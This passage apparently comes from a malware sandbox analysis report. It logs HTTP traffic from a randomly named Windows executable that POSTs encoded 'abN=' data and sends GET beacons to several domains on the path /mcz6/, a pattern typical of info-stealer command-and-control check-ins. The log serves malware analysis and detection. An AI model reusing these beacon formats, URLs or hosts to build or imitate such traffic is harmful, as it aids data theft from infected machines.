abN=bOU4KtZ1M2hWfNTrTbHdZmeo5NbKaWYopmdzkKLNW6whbT4HVDB7Q0ZNEmxj7L4d4UcR7uKmkSh5vNEV2LGSnWRRbswZzy0nJzqbH72oWXgz6sNsY2ukgTBR3E+dzanCl2vAPgoKIIK4PF3XCod4knx9Lunkcr2bUAkJ8vZ3jhK/AHigvtD0/7Ln/0Uyr59rDYv3RVnFDk5SnRJZqVT0iyhBV7YJe411rjiiHQ08qMRSXYt4Cym7Ql6n0LazJCwVo2OH5O+Uwk21qMat8MRTQxHxScPhwE7UreL+/Hu1dlv4AK2D4AEZKoDtvlSyT87BVvny4crJXoY5ysBFoHZlhs8biF8ghonVFMeyTYwy/CnfwbMjauw9ayWkhTpE6CJBh3oL47AEHm0gMJlHLdUXmIqEq4Rv+3rZ0brwTXXMAk7YjIkArZK4VRTg4WZCMvdHEHjCEcRnWkmM5ajzUdRqNWQLGF7xW4zmKd+PT06b9pY6yqmNmtx7UYw94rGdh1bB3Oy1Vou6xwDOo9KTQQC8jVB0QJ8Y55uEkhIZCPgTqFkcfeBlJnJgapk5o9GFhQ8DiOkDPoIH7xxCAMHghgUwBzOC/SjFerLpV78wxoZlMNq8VelPYQE0v+5IktKGaYYMxOAXCUdUrNs5ooTE/R7pekJWT+3FLpYREpfCvmOjo8mFkVqNMHTcVR+BzLVAV5PoAoH2P///1kvXux8F98cwRR2JIeUfJZwsHrUf8TYQUz7gSUzFUvUxWSXJjw1oGTPUcOgXMpKffQD3y1auf3nAyLZvFFkL24nHOJFDwRvPs2XiHKcbtjcxWqhtMcfdOZYvrHPRu5Jt34EQCCOsHcAKi0sDf5MB7MyuLU6ladgM7Xu62UgPkhspreCERYuiYP5psloLbEvCef1RLuq5cb3plP9DtfxEsmwfl+Yoau2bCUVMbqwHmhcdVvz1/en4jfO+M/mNHF0j4v1Nouwc4+4/7OecZBeAgI2OyxRUquK7PjO3hghl [TRUNCATED]
Jun 5, 2024 15:07:37.081274033 CEST	570	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 05 Jun 2024 13:07:36 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close x-backend: web4 X-Frontend: frontend1 X-Trace-Id: ti_b6804f04be789205aab4f153b14347b3 Content-Encoding: br Data Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 115 7&dy{qm K=\|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49772	103.168.172.37	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:07:38.937741041 CEST	485	OUT	GET /mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=WM8YJa5qA0NkIP/fN4mRPH2hsfvjO1kWxn5RlfXsP+w6QT8BWCtnYGsQFWxr+5Q3wXsj3+rXjilTrq1L87WN5VMBaPcH6h4tJWWqH5H+VkhDr+c9eHm1vWk= HTTP/1.1 Host: www.celebration24.co.uk Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Jun 5, 2024 15:07:39.614197016 CEST	796	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 05 Jun 2024 13:07:39 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 544 Connection: close x-backend: web4 X-Frontend: frontend1 X-Trace-Id: ti_182aafc96bfd624190b1aed8549e7cc4 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 66 69 6c 65 73 74 6f 72 61 67 65 2f 63 73 73 2f 6d 61 69 6e 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 61 20 6e 61 6d 65 3d 22 54 6f 70 22 3e 3c 2f 61 3e 0a 3c 68 31 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 61 20 70 61 67 65 20 66 6f 72 20 74 68 65 20 6c 69 6e 6b 20 79 6f 75 20 76 69 73 69 74 65 64 2e 20 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 74 68 65 20 63 6f 72 72 65 63 74 20 6c 69 6e 6b 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c [TRUNCATED] Data Ascii: <!DOCTYPE html><html><head><title>No page found</title><link rel="stylesheet" type="text/css" href="https://www.fastmailusercontent.com/filestorage/css/main.css" /></head><body><a name="Top"></a><h1>No page found</h1><p>We couldn't find a page for the link you visited. Please check that you have the correct link and try again.</p><p>If you are the owner of this domain, you can setup a page here by <a href="https://www.fastmail.help/hc/en-us/articles/1500000280141">creating a page/website in your account</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49773	104.37.39.71	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:07:44.734158039 CEST	757	OUT	POST /mcz6/ HTTP/1.1 Host: www.gledingakademiet.no Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.gledingakademiet.no Referer: http://www.gledingakademiet.no/mcz6/ Connection: close Content-Length: 200 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 43 44 53 5a 69 62 37 68 6f 6a 76 56 39 51 45 69 31 64 7a 7a 54 42 71 56 4a 34 6f 5a 64 56 76 4a 73 62 42 55 64 7a 52 39 6a 4c 47 6c 42 50 64 73 48 6c 4b 51 43 5a 5a 39 43 6b 5a 74 41 41 57 36 69 44 75 6f 49 43 73 55 42 49 68 37 51 79 48 49 30 58 51 76 64 37 30 6b 45 37 72 6b 4f 4f 76 48 73 6e 41 4a 6f 62 74 38 46 2b 72 78 78 33 52 5a 35 54 66 6b 4e 79 68 73 4d 68 4b 4f 4a 69 6e 68 32 34 6b 4f 68 73 72 4e 5a 50 6d 53 61 33 38 35 7a 74 30 33 6a 63 76 74 4f 51 4f 75 34 33 6a 6c 53 6e 56 51 36 76 35 61 5a 42 70 51 54 55 43 31 33 6e 69 74 65 42 63 2b 33 30 35 2b 66 6f 34 79 5a 67 3d 3d Data Ascii: abN=CDSZib7hojvV9QEi1dzzTBqVJ4oZdVvJsbBUdzR9jLGlBPdsHlKQCZZ9CkZtAAW6iDuoICsUBIh7QyHI0XQvd70kE7rkOOvHsnAJobt8F+rxx3RZ5TfkNyhsMhKOJinh24kOhsrNZPmSa385zt03jcvtOQOu43jlSnVQ6v5aZBpQTUC13niteBc+305+fo4yZg==
Jun 5, 2024 15:07:45.615015984 CEST	161	IN	HTTP/1.1 404 Not Found Content-Length: 18 Content-Type: text/plain Date: Wed, 05 Jun 2024 13:07:45 GMT Server: Caddy Connection: close Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49774	104.37.39.71	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:07:47.264890909 CEST	777	OUT	POST /mcz6/ HTTP/1.1 Host: www.gledingakademiet.no Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.gledingakademiet.no Referer: http://www.gledingakademiet.no/mcz6/ Connection: close Content-Length: 220 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 43 44 53 5a 69 62 37 68 6f 6a 76 56 38 7a 63 69 79 2b 62 7a 55 68 71 57 56 6f 6f 5a 49 46 76 4e 73 62 4e 55 64 78 38 77 67 35 53 6c 41 72 52 73 45 6e 75 51 42 5a 5a 39 58 55 5a 6b 45 41 57 78 69 44 71 67 49 41 6f 55 42 49 46 37 51 77 50 49 30 6b 49 67 63 72 30 6d 4c 62 72 71 44 75 76 48 73 6e 41 4a 6f 62 35 47 46 2b 44 78 78 45 5a 5a 36 79 66 6e 52 69 68 76 4c 68 4b 4f 61 79 6e 74 32 34 6c 62 68 74 6e 6e 5a 4d 65 53 61 79 41 35 79 2f 63 77 34 4d 76 6e 41 77 50 38 30 58 53 66 57 47 59 34 36 73 31 61 47 69 46 51 62 79 54 76 6d 57 44 36 4d 42 34 4e 71 7a 77 4b 53 72 46 37 43 69 37 6e 61 47 48 59 38 55 51 64 76 70 62 57 67 76 32 4b 6c 4d 77 3d Data Ascii: abN=CDSZib7hojvV8zciy+bzUhqWVooZIFvNsbNUdx8wg5SlArRsEnuQBZZ9XUZkEAWxiDqgIAoUBIF7QwPI0kIgcr0mLbrqDuvHsnAJob5GF+DxxEZZ6yfnRihvLhKOaynt24lbhtnnZMeSayA5y/cw4MvnAwP80XSfWGY46s1aGiFQbyTvmWD6MB4NqzwKSrF7Ci7naGHY8UQdvpbWgv2KlMw=
Jun 5, 2024 15:07:48.112588882 CEST	161	IN	HTTP/1.1 404 Not Found Content-Length: 18 Content-Type: text/plain Date: Wed, 05 Jun 2024 13:07:47 GMT Server: Caddy Connection: close Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49775	104.37.39.71	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:07:49.799115896 CEST	10859	OUT	POST /mcz6/ HTTP/1.1 Host: www.gledingakademiet.no Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.gledingakademiet.no Referer: http://www.gledingakademiet.no/mcz6/ Connection: close Content-Length: 10300 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 43 44 53 5a 69 62 37 68 6f 6a 76 56 38 7a 63 69 79 2b 62 7a 55 68 71 57 56 6f 6f 5a 49 46 76 4e 73 62 4e 55 64 78 38 77 67 34 71 6c 41 59 5a 73 47 47 75 51 41 5a 5a 39 57 55 5a 70 45 41 57 67 69 44 53 73 49 41 6b 69 42 4f 42 37 54 53 33 49 79 56 49 67 54 72 30 6d 4a 62 72 72 4f 4f 75 48 73 6e 77 4e 6f 62 70 47 46 2b 44 78 78 44 70 5a 73 54 66 6e 54 69 68 73 4d 68 4b 43 4a 69 6e 42 32 2b 4e 4c 68 74 6a 64 59 38 2b 53 61 53 77 35 77 4b 41 77 6c 63 76 70 4e 51 4f 35 30 58 65 36 57 43 34 61 36 76 6f 39 47 68 5a 51 59 32 69 47 79 33 48 4e 51 47 56 54 2f 79 4d 56 52 59 56 74 42 77 58 43 61 33 54 2f 6b 6e 52 32 30 71 57 30 2f 64 69 72 30 5a 6b 37 39 45 4a 79 53 61 33 6b 53 68 59 76 53 31 59 32 4f 51 56 7a 2f 44 68 6a 68 63 72 6f 68 30 44 7a 35 43 6c 6f 73 73 67 45 64 73 69 68 6d 63 67 6f 72 70 6a 41 7a 78 79 52 6e 55 7a 59 79 59 46 2f 49 49 31 67 6d 4c 73 76 36 33 75 6b 76 4f 6d 4a 46 31 68 71 45 48 63 4d 56 37 73 61 47 4f 74 57 42 42 79 31 69 2f 4f 49 56 36 63 41 4f 46 65 59 5a 6a 66 32 67 44 [TRUNCATED] Data Ascii: abN=CDSZib7hojvV8zciy+bzUhqWVooZIFvNsbNUdx8wg4qlAYZsGGuQAZZ9WUZpEAWgiDSsIAkiBOB7TS3IyVIgTr0mJbrrOOuHsnwNobpGF+DxxDpZsTfnTihsMhKCJinB2+NLhtjdY8+SaSw5wKAwlcvpNQO50Xe6WC4a6vo9GhZQY2iGy3HNQGVT/yMVRYVtBwXCa3T/knR20qW0/dir0Zk79EJySa3kShYvS1Y2OQVz/Dhjhcroh0Dz5ClossgEdsihmcgorpjAzxyRnUzYyYF/II1gmLsv63ukvOmJF1hqEHcMV7saGOtWBBy1i/OIV6cAOFeYZjf2gDsj3adzQxYdBabtnTMzcnJELqavT/WzGQOZtyFix+ENfptRcvLfOhYd5IZLSiGIiDYcBmhEL/v/CaD81Vz1Ht2s/COtvZC/JTlvvjAk8AIw5MuRqHblwZNh9wJaDWcTZ8R7Lu/VnxqGDcl1phxXZb4HfhCAKYj12FMARinCKxORZKNB+4DDox5qpN66aP0o2QyA3gP/mqFZTC4fy6ugrxV1Y8Gp11dQYL+MoiXpZebeL+U8wbJFnS4xQ3x9BHysEC2lsGsZcHcrqUznmUMynU9yOuU8P7jRTMxLh+nLA5gwoTJVQcs389TfAOeURNTPHqydmW73hv/GrwMlmxPpMjFCjoMrx2ruzv9GTEogsHNmFh1zR96cyAhLc2oyNT5bWUiZQSZ8e3ibiX0BQeX3Ns0TFkBK9HBxJy2Gk18N2d31FT2spnlsWjbQi6JvhU2PQKLhEnsILhYFLgCxTPtFGL/5cQCSr++4sysW63CtcViY9CIcl5Er04Bep8jZdaNp0Gs3TCOe2wFQlLMy/nYpcgb4rk3jQW7u8ss9YsQdfsqgLuiZbqG6Z+NMFtZxYXuqFcZQBSBq5BeBqjw2wqAI/7GO9QFN8gmogD+SWN+R3ZEcHJk26rFg8fyszymmdWfGQMrQf1Wm4vmxnVciAisKlwhgI1Ne9kNPL+LW [TRUNCATED]
Jun 5, 2024 15:07:50.653172970 CEST	161	IN	HTTP/1.1 404 Not Found Content-Length: 18 Content-Type: text/plain Date: Wed, 05 Jun 2024 13:07:50 GMT Server: Caddy Connection: close Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49776	104.37.39.71	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:07:52.330377102 CEST	485	OUT	GET /mcz6/?abN=PB65ht3xmDnV1ShWjeHediWpJ6xhKUn+w4dQHmlxp9S6BIZIF1eyIZ9SallNAheKgV6/CipsbblBAwuU+20rDr4rF7jlE8qBiXwygrRuGMbV3F1YqBDOThA=&HV8hD=_ZnHYJfHNd6deTQP HTTP/1.1 Host: www.gledingakademiet.no Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Jun 5, 2024 15:07:53.171087027 CEST	252	IN	HTTP/1.1 200 OK Content-Length: 101 Content-Type: text/html; charset=utf-8 Date: Wed, 05 Jun 2024 13:07:53 GMT Server: Caddy Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 68 31 3e 50 61 72 6b 65 64 3c 2f 68 31 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: <html><head> <title>Parked</title></head><body> <h1>Parked</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49777	199.59.243.225	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:08:06.599112988 CEST	742	OUT	POST /mcz6/ HTTP/1.1 Host: www.zwervertjes.be Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.zwervertjes.be Referer: http://www.zwervertjes.be/mcz6/ Connection: close Content-Length: 200 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 6e 6c 66 54 6e 6f 4c 50 74 39 71 46 78 6e 2b 59 4d 75 75 70 36 59 77 39 4c 32 5a 34 46 50 70 44 61 51 4c 6b 47 45 6b 6b 39 62 6c 46 4f 57 74 47 49 65 2f 38 50 35 6a 42 6d 70 54 4b 51 4d 4f 6b 5a 51 37 6d 42 43 7a 36 6a 31 42 35 66 52 4c 6b 6f 59 44 62 64 6a 4b 47 77 58 42 6f 47 77 70 44 4e 75 78 36 77 58 71 72 6a 33 46 77 76 48 31 39 68 49 4c 2b 6e 32 36 59 70 49 6c 47 74 73 73 4b 31 66 6a 78 39 74 35 42 4a 72 72 75 50 39 33 7a 75 75 59 6c 50 39 5a 73 42 36 4a 30 30 6c 77 57 67 45 70 6b 39 50 64 36 54 59 69 57 4f 61 31 6c 2f 49 7a 30 2f 6c 35 67 70 61 5a 47 45 74 34 4a 4f 77 3d 3d Data Ascii: abN=nlfTnoLPt9qFxn+YMuup6Yw9L2Z4FPpDaQLkGEkk9blFOWtGIe/8P5jBmpTKQMOkZQ7mBCz6j1B5fRLkoYDbdjKGwXBoGwpDNux6wXqrj3FwvH19hIL+n26YpIlGtssK1fjx9t5BJrruP93zuuYlP9ZsB6J00lwWgEpk9Pd6TYiWOa1l/Iz0/l5gpaZGEt4JOw==
Jun 5, 2024 15:08:07.217701912 CEST	1236	IN	HTTP/1.1 200 OK date: Wed, 05 Jun 2024 13:08:06 GMT content-type: text/html; charset=utf-8 content-length: 1126 x-request-id: 8cdcdfae-f82c-4f55-b501-56054f6bfa9f cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CErFf42/7fpWRcL8kVjmtjJDSVTVgta8/tk0oCRadOhc+nDx9AsnHQqDD83z1E/puZhAPPM2p7Ja006YzUCHcA== set-cookie: parking_session=8cdcdfae-f82c-4f55-b501-56054f6bfa9f; expires=Wed, 05 Jun 2024 13:23:07 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 45 72 46 66 34 32 2f 37 66 70 57 52 63 4c 38 6b 56 6a 6d 74 6a 4a 44 53 56 54 56 67 74 61 38 2f 74 6b 30 6f 43 52 61 64 4f 68 63 2b 6e 44 78 39 41 73 6e 48 51 71 44 44 38 33 7a 31 45 2f 70 75 5a 68 41 50 50 4d 32 70 37 4a 61 30 30 36 59 7a 55 43 48 63 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CErFf42/7fpWRcL8kVjmtjJDSVTVgta8/tk0oCRadOhc+nDx9AsnHQqDD83z1E/puZhAPPM2p7Ja006YzUCHcA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jun 5, 2024 15:08:07.217731953 CEST	579	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOGNkY2RmYWUtZjgyYy00ZjU1LWI1MDEtNTYwNTRmNmJmYTlmIiwicGFnZV90aW1lIjoxNzE3NTkyOD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49778	199.59.243.225	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:08:09.139584064 CEST	762	OUT	POST /mcz6/ HTTP/1.1 Host: www.zwervertjes.be Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.zwervertjes.be Referer: http://www.zwervertjes.be/mcz6/ Connection: close Content-Length: 220 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 6e 6c 66 54 6e 6f 4c 50 74 39 71 46 72 47 4f 59 4b 50 75 70 38 34 77 79 45 57 5a 34 65 2f 6f 49 61 51 48 6b 47 46 77 30 39 70 52 46 4f 79 70 47 4a 62 54 38 4d 35 6a 42 70 4a 53 41 55 4d 4f 74 5a 51 48 75 42 43 2f 36 6a 31 46 35 66 54 54 6b 6f 49 2f 59 50 6a 4b 2b 38 33 42 71 49 51 70 44 4e 75 78 36 77 58 4f 46 6a 7a 70 77 73 30 74 39 7a 71 69 6f 6b 32 36 62 2f 59 6c 47 70 73 73 77 31 66 6a 48 39 73 55 55 4a 74 76 75 50 2f 66 7a 76 2f 59 69 55 4e 59 6e 4d 61 49 35 69 6c 42 59 72 52 45 2f 30 38 74 5a 53 73 69 35 43 38 6b 2f 75 35 53 6a 74 6c 64 54 30 64 51 79 4a 75 46 41 56 36 4a 38 6f 6b 2f 4c 71 43 67 30 6c 42 38 44 46 64 67 39 7a 43 59 3d Data Ascii: abN=nlfTnoLPt9qFrGOYKPup84wyEWZ4e/oIaQHkGFw09pRFOypGJbT8M5jBpJSAUMOtZQHuBC/6j1F5fTTkoI/YPjK+83BqIQpDNux6wXOFjzpws0t9zqiok26b/YlGpssw1fjH9sUUJtvuP/fzv/YiUNYnMaI5ilBYrRE/08tZSsi5C8k/u5SjtldT0dQyJuFAV6J8ok/LqCg0lB8DFdg9zCY=
Jun 5, 2024 15:08:09.954148054 CEST	1236	IN	HTTP/1.1 200 OK date: Wed, 05 Jun 2024 13:08:09 GMT content-type: text/html; charset=utf-8 content-length: 1126 x-request-id: 0d9596fd-6a00-496d-a732-6fb043ddc04a cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CErFf42/7fpWRcL8kVjmtjJDSVTVgta8/tk0oCRadOhc+nDx9AsnHQqDD83z1E/puZhAPPM2p7Ja006YzUCHcA== set-cookie: parking_session=0d9596fd-6a00-496d-a732-6fb043ddc04a; expires=Wed, 05 Jun 2024 13:23:09 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 